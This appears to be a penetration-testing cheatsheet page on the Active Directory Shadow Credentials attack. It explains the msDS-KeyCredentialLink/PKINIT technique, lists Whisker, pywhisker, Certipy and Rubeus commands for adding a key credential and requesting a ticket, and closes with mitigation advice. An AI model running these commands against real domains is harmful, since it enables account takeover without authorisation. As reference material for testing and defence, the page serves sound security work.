Back to Active Directory

Shadow Credentials

Active Directory cheatsheet — Active Directory enumeration and attack techniques.

Overview

Shadow Credentials attack allows an attacker with GenericWrite/GenericAll over an AD object to add KeyCredentialLink attributes to it. This creates alternate credentials (certificate-based) that the attacker can authenticate with.

The attack works by adding a certificate public key to the target object's msDS-KeyCredentialLink attribute, then using the corresponding private key to authenticate via PKINIT.

Category: Active Directory — Active Directory enumeration and attack techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Shadow Credentials:

Whisker.exe add /target:targetuser$ /domain:domain.local /path:cert.pfx /password:Pass123
pywhisker -d domain.local -u attacker -p password --target targetuser$ --action add --filename cert.pfx
certipy shadow auto -u attacker@domain.local -p 'password' -account targetuser$ -dc-ip 10.10.10.10
Rubeus.exe asktgt /user:targetuser$ /certificate:cert.pfx /password:Pass123 /ptt

Tools & Techniques

Recommended tools for Shadow Credentials:

  • Whisker: .NET shadow credentials tool
  • pywhisker: Python shadow credentials tool
  • Certipy shadow: automated shadow credentials attack
  • Rubeus: authenticate with shadow certificate
  • Requires: GenericWrite/GenericAll on target object

Prevention & Mitigation

Security recommendations to prevent Shadow Credentials:

  • Restrict who has GenericWrite/GenericAll on sensitive objects
  • Monitor msDS-KeyCredentialLink attribute modifications
  • Use Protected Users security group to prevent PKINIT
  • Audit for addition of KeyCredentialLink attributes

References

Additional resources: